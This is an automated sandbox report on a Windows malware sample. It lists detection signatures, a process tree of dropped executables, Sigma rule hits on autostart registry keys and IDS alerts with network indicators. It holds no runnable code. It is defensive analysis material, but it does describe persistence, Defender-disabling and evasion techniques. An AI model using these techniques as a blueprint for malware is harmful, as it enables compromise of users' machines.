Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HqvlYZC7Gf.exe

Overview

General Information

Sample name:HqvlYZC7Gf.exe
(renamed file extension from none to exe)
Original sample name:HqvlYZC7Gf
Analysis ID:1534090
MD5:2cdb760530ec92b79ee2bf80371cac90
SHA1:70ef5a50636afaaa91ff0cb0df77f7e2fe14b6b2
SHA256:e0e9067bd90b97af4c6bcdfee36fad24b4cf382be9314d58532acc0db0c7b37b
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Changes autostart functionality of drives
Changes the view of files in windows explorer (hidden files and folders)
Connects to many different private IPs (likely to spread or exploit)
Connects to many different private IPs via SMB (likely to spread or exploit)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to detect sleep reduction / modifications
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autorun.inf (USB autostart)
Creates multiple autostart registry keys
Deletes keys related to Windows Defender
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Disables Windows Defender (deletes autostart)
Disables the Windows registry editor (regedit)
Disables user account control notifications
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to resolve many domain names, but no domain seems valid
Abnormal high CPU Usage
Connects to many different domains
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May check the online IP address of the machine
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • HqvlYZC7Gf.exe (PID: 2328 cmdline: "C:\Users\user\Desktop\HqvlYZC7Gf.exe" MD5: 2CDB760530EC92B79EE2BF80371CAC90)
    • takyouhoymc.exe (PID: 4740 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe*" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
      • zjisvko.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe" MD5: 6B760F8FDCB57B4FEFC1487B46EF20CD)
      • zjisvko.exe (PID: 4148 cmdline: "C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe" MD5: 6B760F8FDCB57B4FEFC1487B46EF20CD)
    • takyouhoymc.exe (PID: 7272 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 3020 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 1996 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 4852 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 5824 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 4808 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 1072 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 5084 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 2052 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 6652 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 460 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 4880 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 7848 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 6484 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
    • takyouhoymc.exe (PID: 2156 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe" MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
  • ojtoccrezqmarmjwql.exe (PID: 7816 cmdline: "C:\Windows\ojtoccrezqmarmjwql.exe" . MD5: 2CDB760530EC92B79EE2BF80371CAC90)
    • takyouhoymc.exe (PID: 7648 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\ojtoccrezqmarmjwql.exe*." MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
  • bzmkbewmkeduommczxkiz.exe (PID: 6084 cmdline: "C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe" . MD5: 2CDB760530EC92B79EE2BF80371CAC90)
    • takyouhoymc.exe (PID: 7536 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\bzmkbewmkeduommczxkiz.exe*." MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
  • mjvsikbqngeunkjyurda.exe (PID: 820 cmdline: "C:\Windows\mjvsikbqngeunkjyurda.exe" . MD5: 2CDB760530EC92B79EE2BF80371CAC90)
    • takyouhoymc.exe (PID: 5528 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\mjvsikbqngeunkjyurda.exe*." MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
  • mjvsikbqngeunkjyurda.exe (PID: 6612 cmdline: "C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe" . MD5: 2CDB760530EC92B79EE2BF80371CAC90)
    • takyouhoymc.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\mjvsikbqngeunkjyurda.exe*." MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
  • yrzsecpaticodwrc.exe (PID: 5504 cmdline: "C:\Windows\yrzsecpaticodwrc.exe" MD5: 2CDB760530EC92B79EE2BF80371CAC90)
  • fzicpocoiytgwqmyr.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe" MD5: 2CDB760530EC92B79EE2BF80371CAC90)
  • mjvsikbqngeunkjyurda.exe (PID: 6276 cmdline: "C:\Windows\mjvsikbqngeunkjyurda.exe" MD5: 2CDB760530EC92B79EE2BF80371CAC90)
  • fzicpocoiytgwqmyr.exe (PID: 6392 cmdline: "C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe" MD5: 2CDB760530EC92B79EE2BF80371CAC90)
  • yrzsecpaticodwrc.exe (PID: 4376 cmdline: "C:\Windows\yrzsecpaticodwrc.exe" . MD5: 2CDB760530EC92B79EE2BF80371CAC90)
    • takyouhoymc.exe (PID: 4580 cmdline: "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\yrzsecpaticodwrc.exe*." MD5: C2093FBC0B0C6BD085F3AB7056BA31F5)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe, ProcessId: 4740, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\qfjygajqfqgo
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: zvgcrsiwskhwokiwrny.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe, ProcessId: 4740, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\qhneokveviakxo
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: yrzsecpaticodwrc.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe, ProcessId: 4740, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\qfjygajqfqgo
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:39:25.100253+020020181411A Network Trojan was detected35.164.78.20080192.168.11.3049818TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:39:25.100253+020020377711A Network Trojan was detected35.164.78.20080192.168.11.3049818TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:39:04.516532+020020187731A Network Trojan was detected192.168.11.3049799104.19.223.7980TCP
2024-10-15T15:39:05.944586+020020187731A Network Trojan was detected192.168.11.3049800172.67.155.17580TCP
2024-10-15T15:39:09.546757+020020187731A Network Trojan was detected192.168.11.3049803104.19.223.7980TCP
2024-10-15T15:39:10.856018+020020187731A Network Trojan was detected192.168.11.3049804104.19.223.7980TCP
2024-10-15T15:39:12.302442+020020187731A Network Trojan was detected192.168.11.3049805104.27.206.9280TCP
2024-10-15T15:39:17.912787+020020187731A Network Trojan was detected192.168.11.3049810104.27.206.9280TCP
2024-10-15T15:39:21.359177+020020187731A Network Trojan was detected192.168.11.3049813104.27.206.9280TCP
2024-10-15T15:39:22.660608+020020187731A Network Trojan was detected192.168.11.3049814104.19.223.7980TCP
2024-10-15T15:39:25.001188+020020187731A Network Trojan was detected192.168.11.3049820104.19.223.7980TCP
2024-10-15T15:39:26.307764+020020187731A Network Trojan was detected192.168.11.3049822104.27.206.9280TCP
2024-10-15T15:39:29.880511+020020187731A Network Trojan was detected192.168.11.3049827104.19.223.7980TCP
2024-10-15T15:39:33.208180+020020187731A Network Trojan was detected192.168.11.3049831104.19.223.7980TCP
2024-10-15T15:39:34.503486+020020187731A Network Trojan was detected192.168.11.3049833172.67.155.17580TCP
2024-10-15T15:39:35.819415+020020187731A Network Trojan was detected192.168.11.3049834104.19.223.7980TCP
2024-10-15T15:39:38.405222+020020187731A Network Trojan was detected192.168.11.3049838104.27.207.9280TCP
2024-10-15T15:39:40.725141+020020187731A Network Trojan was detected192.168.11.3049842172.67.155.17580TCP
2024-10-15T15:39:42.019421+020020187731A Network Trojan was detected192.168.11.3049843104.27.207.9280TCP
2024-10-15T15:39:43.319151+020020187731A Network Trojan was detected192.168.11.3049844104.19.223.7980TCP
2024-10-15T15:39:45.762930+020020187731A Network Trojan was detected192.168.11.3049848104.27.207.9280TCP
2024-10-15T15:39:47.050668+020020187731A Network Trojan was detected192.168.11.3049850104.27.207.9280TCP
2024-10-15T15:39:48.354841+020020187731A Network Trojan was detected192.168.11.3049851104.19.223.7980TCP
2024-10-15T15:39:49.639115+020020187731A Network Trojan was detected192.168.11.3049853104.19.223.7980TCP
2024-10-15T15:39:51.457160+020020187731A Network Trojan was detected192.168.11.3049856104.27.207.9280TCP
2024-10-15T15:39:52.748770+020020187731A Network Trojan was detected192.168.11.3049859172.67.155.17580TCP
2024-10-15T15:39:55.210914+020020187731A Network Trojan was detected192.168.11.3049861104.27.207.9280TCP
2024-10-15T15:39:56.540651+020020187731A Network Trojan was detected192.168.11.3049862104.27.207.9280TCP
2024-10-15T15:40:00.123881+020020187731A Network Trojan was detected192.168.11.3049867172.67.155.17580TCP
2024-10-15T15:40:03.478251+020020187731A Network Trojan was detected192.168.11.3049871172.67.155.17580TCP
2024-10-15T15:40:05.929226+020020187731A Network Trojan was detected192.168.11.3049875104.27.207.9280TCP
2024-10-15T15:40:08.247126+020020187731A Network Trojan was detected192.168.11.3049877104.19.223.7980TCP
2024-10-15T15:40:10.687194+020020187731A Network Trojan was detected192.168.11.3049880172.67.155.17580TCP
2024-10-15T15:40:12.037433+020020187731A Network Trojan was detected192.168.11.3049882104.27.207.9280TCP
2024-10-15T15:40:14.497426+020020187731A Network Trojan was detected192.168.11.3049885104.27.207.9280TCP
2024-10-15T15:40:15.793845+020020187731A Network Trojan was detected192.168.11.3049887104.27.207.9280TCP
2024-10-15T15:40:18.490635+020020187731A Network Trojan was detected192.168.11.3049892104.27.207.9280TCP
2024-10-15T15:40:19.798795+020020187731A Network Trojan was detected192.168.11.3049894172.67.155.17580TCP
2024-10-15T15:40:21.109031+020020187731A Network Trojan was detected192.168.11.3049896104.19.223.7980TCP
2024-10-15T15:40:22.406157+020020187731A Network Trojan was detected192.168.11.3049897104.27.207.9280TCP
2024-10-15T15:40:24.894183+020020187731A Network Trojan was detected192.168.11.3049901104.27.207.9280TCP
2024-10-15T15:40:27.208180+020020187731A Network Trojan was detected192.168.11.3049904104.19.223.7980TCP
2024-10-15T15:40:28.506677+020020187731A Network Trojan was detected192.168.11.3049905172.67.155.17580TCP
2024-10-15T15:40:30.950610+020020187731A Network Trojan was detected192.168.11.3049909172.67.155.17580TCP
2024-10-15T15:40:33.272161+020020187731A Network Trojan was detected192.168.11.3049913172.67.155.17580TCP
2024-10-15T15:40:34.592839+020020187731A Network Trojan was detected192.168.11.3049914172.67.155.17580TCP
2024-10-15T15:40:35.899228+020020187731A Network Trojan was detected192.168.11.3049915104.27.207.9280TCP
2024-10-15T15:40:38.335973+020020187731A Network Trojan was detected192.168.11.3049919104.19.223.7980TCP
2024-10-15T15:40:41.681987+020020187731A Network Trojan was detected192.168.11.3049924104.19.223.7980TCP
2024-10-15T15:40:43.573656+020020187731A Network Trojan was detected192.168.11.3049927172.67.155.17580TCP
2024-10-15T15:40:47.294589+020020187731A Network Trojan was detected192.168.11.3049932104.27.207.9280TCP
2024-10-15T15:40:50.649816+020020187731A Network Trojan was detected192.168.11.3049937104.19.223.7980TCP
2024-10-15T15:40:53.821856+020020187731A Network Trojan was detected192.168.11.3049941104.19.223.7980TCP
2024-10-15T15:40:57.267600+020020187731A Network Trojan was detected192.168.11.3049945172.67.155.17580TCP
2024-10-15T15:41:03.892130+020020187731A Network Trojan was detected192.168.11.3049954104.19.223.7980TCP
2024-10-15T15:41:07.467550+020020187731A Network Trojan was detected192.168.11.3049959104.19.223.7980TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:39:04.516532+020028033073Unknown Traffic192.168.11.3049799104.19.223.7980TCP
2024-10-15T15:39:05.944586+020028033073Unknown Traffic192.168.11.3049800172.67.155.17580TCP
2024-10-15T15:39:09.546757+020028033073Unknown Traffic192.168.11.3049803104.19.223.7980TCP
2024-10-15T15:39:10.856018+020028033073Unknown Traffic192.168.11.3049804104.19.223.7980TCP
2024-10-15T15:39:12.302442+020028033073Unknown Traffic192.168.11.3049805104.27.206.9280TCP
2024-10-15T15:39:17.912787+020028033073Unknown Traffic192.168.11.3049810104.27.206.9280TCP
2024-10-15T15:39:21.359177+020028033073Unknown Traffic192.168.11.3049813104.27.206.9280TCP
2024-10-15T15:39:22.660608+020028033073Unknown Traffic192.168.11.3049814104.19.223.7980TCP
2024-10-15T15:39:24.111158+020028033073Unknown Traffic192.168.11.304981534.111.176.15680TCP
2024-10-15T15:39:24.718814+020028033073Unknown Traffic192.168.11.304981931.13.67.3580TCP
2024-10-15T15:39:24.820055+020028033073Unknown Traffic192.168.11.304981835.164.78.20080TCP
2024-10-15T15:39:25.001188+020028033073Unknown Traffic192.168.11.3049820104.19.223.7980TCP
2024-10-15T15:39:26.307764+020028033073Unknown Traffic192.168.11.3049822104.27.206.9280TCP
2024-10-15T15:39:26.339356+020028033073Unknown Traffic192.168.11.304982185.214.228.14080TCP
2024-10-15T15:39:29.201995+020028033073Unknown Traffic192.168.11.3049825208.100.26.24580TCP
2024-10-15T15:39:29.880511+020028033073Unknown Traffic192.168.11.3049827104.19.223.7980TCP
2024-10-15T15:39:33.208180+020028033073Unknown Traffic192.168.11.3049831104.19.223.7980TCP
2024-10-15T15:39:34.503486+020028033073Unknown Traffic192.168.11.3049833172.67.155.17580TCP
2024-10-15T15:39:35.819415+020028033073Unknown Traffic192.168.11.3049834104.19.223.7980TCP
2024-10-15T15:39:38.405222+020028033073Unknown Traffic192.168.11.3049838104.27.207.9280TCP
2024-10-15T15:39:40.725141+020028033073Unknown Traffic192.168.11.3049842172.67.155.17580TCP
2024-10-15T15:39:42.019421+020028033073Unknown Traffic192.168.11.3049843104.27.207.9280TCP
2024-10-15T15:39:43.319151+020028033073Unknown Traffic192.168.11.3049844104.19.223.7980TCP
2024-10-15T15:39:45.762930+020028033073Unknown Traffic192.168.11.3049848104.27.207.9280TCP
2024-10-15T15:39:47.050668+020028033073Unknown Traffic192.168.11.3049850104.27.207.9280TCP
2024-10-15T15:39:48.354841+020028033073Unknown Traffic192.168.11.3049851104.19.223.7980TCP
2024-10-15T15:39:49.639115+020028033073Unknown Traffic192.168.11.3049853104.19.223.7980TCP
2024-10-15T15:39:51.158491+020028033073Unknown Traffic192.168.11.304985518.64.172.22580TCP
2024-10-15T15:39:51.457160+020028033073Unknown Traffic192.168.11.3049856104.27.207.9280TCP
2024-10-15T15:39:52.748770+020028033073Unknown Traffic192.168.11.3049859172.67.155.17580TCP
2024-10-15T15:39:55.210914+020028033073Unknown Traffic192.168.11.3049861104.27.207.9280TCP
2024-10-15T15:39:56.540651+020028033073Unknown Traffic192.168.11.3049862104.27.207.9280TCP
2024-10-15T15:40:00.123881+020028033073Unknown Traffic192.168.11.3049867172.67.155.17580TCP
2024-10-15T15:40:03.478251+020028033073Unknown Traffic192.168.11.3049871172.67.155.17580TCP
2024-10-15T15:40:05.929226+020028033073Unknown Traffic192.168.11.3049875104.27.207.9280TCP
2024-10-15T15:40:08.247126+020028033073Unknown Traffic192.168.11.3049877104.19.223.7980TCP
2024-10-15T15:40:10.687194+020028033073Unknown Traffic192.168.11.3049880172.67.155.17580TCP
2024-10-15T15:40:12.037433+020028033073Unknown Traffic192.168.11.3049882104.27.207.9280TCP
2024-10-15T15:40:14.497426+020028033073Unknown Traffic192.168.11.3049885104.27.207.9280TCP
2024-10-15T15:40:15.793845+020028033073Unknown Traffic192.168.11.3049887104.27.207.9280TCP
2024-10-15T15:40:17.183166+020028033073Unknown Traffic192.168.11.304988918.64.172.22580TCP
2024-10-15T15:40:18.490635+020028033073Unknown Traffic192.168.11.3049892104.27.207.9280TCP
2024-10-15T15:40:19.798795+020028033073Unknown Traffic192.168.11.3049894172.67.155.17580TCP
2024-10-15T15:40:21.109031+020028033073Unknown Traffic192.168.11.3049896104.19.223.7980TCP
2024-10-15T15:40:22.406157+020028033073Unknown Traffic192.168.11.3049897104.27.207.9280TCP
2024-10-15T15:40:24.894183+020028033073Unknown Traffic192.168.11.3049901104.27.207.9280TCP
2024-10-15T15:40:27.208180+020028033073Unknown Traffic192.168.11.3049904104.19.223.7980TCP
2024-10-15T15:40:28.506677+020028033073Unknown Traffic192.168.11.3049905172.67.155.17580TCP
2024-10-15T15:40:30.950610+020028033073Unknown Traffic192.168.11.3049909172.67.155.17580TCP
2024-10-15T15:40:33.272161+020028033073Unknown Traffic192.168.11.3049913172.67.155.17580TCP
2024-10-15T15:40:34.592839+020028033073Unknown Traffic192.168.11.3049914172.67.155.17580TCP
2024-10-15T15:40:35.899228+020028033073Unknown Traffic192.168.11.3049915104.27.207.9280TCP
2024-10-15T15:40:38.335973+020028033073Unknown Traffic192.168.11.3049919104.19.223.7980TCP
2024-10-15T15:40:41.681987+020028033073Unknown Traffic192.168.11.3049924104.19.223.7980TCP
2024-10-15T15:40:43.251312+020028033073Unknown Traffic192.168.11.3049926151.101.128.8180TCP
2024-10-15T15:40:43.573656+020028033073Unknown Traffic192.168.11.3049927172.67.155.17580TCP
2024-10-15T15:40:47.294589+020028033073Unknown Traffic192.168.11.3049932104.27.207.9280TCP
2024-10-15T15:40:50.649816+020028033073Unknown Traffic192.168.11.3049937104.19.223.7980TCP
2024-10-15T15:40:53.821856+020028033073Unknown Traffic192.168.11.3049941104.19.223.7980TCP
2024-10-15T15:40:57.267600+020028033073Unknown Traffic192.168.11.3049945172.67.155.17580TCP
2024-10-15T15:41:03.892130+020028033073Unknown Traffic192.168.11.3049954104.19.223.7980TCP
2024-10-15T15:41:07.467550+020028033073Unknown Traffic192.168.11.3049959104.19.223.7980TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:39:04.516532+020028033063Unknown Traffic192.168.11.3049799104.19.223.7980TCP
2024-10-15T15:39:05.944586+020028033063Unknown Traffic192.168.11.3049800172.67.155.17580TCP
2024-10-15T15:39:09.546757+020028033063Unknown Traffic192.168.11.3049803104.19.223.7980TCP
2024-10-15T15:39:10.856018+020028033063Unknown Traffic192.168.11.3049804104.19.223.7980TCP
2024-10-15T15:39:12.302442+020028033063Unknown Traffic192.168.11.3049805104.27.206.9280TCP
2024-10-15T15:39:17.912787+020028033063Unknown Traffic192.168.11.3049810104.27.206.9280TCP
2024-10-15T15:39:21.359177+020028033063Unknown Traffic192.168.11.3049813104.27.206.9280TCP
2024-10-15T15:39:22.660608+020028033063Unknown Traffic192.168.11.3049814104.19.223.7980TCP
2024-10-15T15:39:24.111158+020028033063Unknown Traffic192.168.11.304981534.111.176.15680TCP
2024-10-15T15:39:24.718814+020028033063Unknown Traffic192.168.11.304981931.13.67.3580TCP
2024-10-15T15:39:24.820055+020028033063Unknown Traffic192.168.11.304981835.164.78.20080TCP
2024-10-15T15:39:25.001188+020028033063Unknown Traffic192.168.11.3049820104.19.223.7980TCP
2024-10-15T15:39:26.307764+020028033063Unknown Traffic192.168.11.3049822104.27.206.9280TCP
2024-10-15T15:39:26.339356+020028033063Unknown Traffic192.168.11.304982185.214.228.14080TCP
2024-10-15T15:39:29.201995+020028033063Unknown Traffic192.168.11.3049825208.100.26.24580TCP
2024-10-15T15:39:29.880511+020028033063Unknown Traffic192.168.11.3049827104.19.223.7980TCP
2024-10-15T15:39:33.208180+020028033063Unknown Traffic192.168.11.3049831104.19.223.7980TCP
2024-10-15T15:39:34.503486+020028033063Unknown Traffic192.168.11.3049833172.67.155.17580TCP
2024-10-15T15:39:35.819415+020028033063Unknown Traffic192.168.11.3049834104.19.223.7980TCP
2024-10-15T15:39:38.405222+020028033063Unknown Traffic192.168.11.3049838104.27.207.9280TCP
2024-10-15T15:39:40.725141+020028033063Unknown Traffic192.168.11.3049842172.67.155.17580TCP
2024-10-15T15:39:42.019421+020028033063Unknown Traffic192.168.11.3049843104.27.207.9280TCP
2024-10-15T15:39:43.319151+020028033063Unknown Traffic192.168.11.3049844104.19.223.7980TCP
2024-10-15T15:39:45.762930+020028033063Unknown Traffic192.168.11.3049848104.27.207.9280TCP
2024-10-15T15:39:47.050668+020028033063Unknown Traffic192.168.11.3049850104.27.207.9280TCP
2024-10-15T15:39:48.354841+020028033063Unknown Traffic192.168.11.3049851104.19.223.7980TCP
2024-10-15T15:39:49.639115+020028033063Unknown Traffic192.168.11.3049853104.19.223.7980TCP
2024-10-15T15:39:51.158491+020028033063Unknown Traffic192.168.11.304985518.64.172.22580TCP
2024-10-15T15:39:51.457160+020028033063Unknown Traffic192.168.11.3049856104.27.207.9280TCP
2024-10-15T15:39:52.748770+020028033063Unknown Traffic192.168.11.3049859172.67.155.17580TCP
2024-10-15T15:39:55.210914+020028033063Unknown Traffic192.168.11.3049861104.27.207.9280TCP
2024-10-15T15:39:56.540651+020028033063Unknown Traffic192.168.11.3049862104.27.207.9280TCP
2024-10-15T15:40:00.123881+020028033063Unknown Traffic192.168.11.3049867172.67.155.17580TCP
2024-10-15T15:40:03.478251+020028033063Unknown Traffic192.168.11.3049871172.67.155.17580TCP
2024-10-15T15:40:05.929226+020028033063Unknown Traffic192.168.11.3049875104.27.207.9280TCP
2024-10-15T15:40:08.247126+020028033063Unknown Traffic192.168.11.3049877104.19.223.7980TCP
2024-10-15T15:40:10.687194+020028033063Unknown Traffic192.168.11.3049880172.67.155.17580TCP
2024-10-15T15:40:12.037433+020028033063Unknown Traffic192.168.11.3049882104.27.207.9280TCP
2024-10-15T15:40:14.497426+020028033063Unknown Traffic192.168.11.3049885104.27.207.9280TCP
2024-10-15T15:40:15.793845+020028033063Unknown Traffic192.168.11.3049887104.27.207.9280TCP
2024-10-15T15:40:17.183166+020028033063Unknown Traffic192.168.11.304988918.64.172.22580TCP
2024-10-15T15:40:18.490635+020028033063Unknown Traffic192.168.11.3049892104.27.207.9280TCP
2024-10-15T15:40:19.798795+020028033063Unknown Traffic192.168.11.3049894172.67.155.17580TCP
2024-10-15T15:40:21.109031+020028033063Unknown Traffic192.168.11.3049896104.19.223.7980TCP
2024-10-15T15:40:22.406157+020028033063Unknown Traffic192.168.11.3049897104.27.207.9280TCP
2024-10-15T15:40:24.894183+020028033063Unknown Traffic192.168.11.3049901104.27.207.9280TCP
2024-10-15T15:40:27.208180+020028033063Unknown Traffic192.168.11.3049904104.19.223.7980TCP
2024-10-15T15:40:28.506677+020028033063Unknown Traffic192.168.11.3049905172.67.155.17580TCP
2024-10-15T15:40:30.950610+020028033063Unknown Traffic192.168.11.3049909172.67.155.17580TCP
2024-10-15T15:40:33.272161+020028033063Unknown Traffic192.168.11.3049913172.67.155.17580TCP
2024-10-15T15:40:34.592839+020028033063Unknown Traffic192.168.11.3049914172.67.155.17580TCP
2024-10-15T15:40:35.899228+020028033063Unknown Traffic192.168.11.3049915104.27.207.9280TCP
2024-10-15T15:40:38.335973+020028033063Unknown Traffic192.168.11.3049919104.19.223.7980TCP
2024-10-15T15:40:41.681987+020028033063Unknown Traffic192.168.11.3049924104.19.223.7980TCP
2024-10-15T15:40:43.251312+020028033063Unknown Traffic192.168.11.3049926151.101.128.8180TCP
2024-10-15T15:40:43.573656+020028033063Unknown Traffic192.168.11.3049927172.67.155.17580TCP
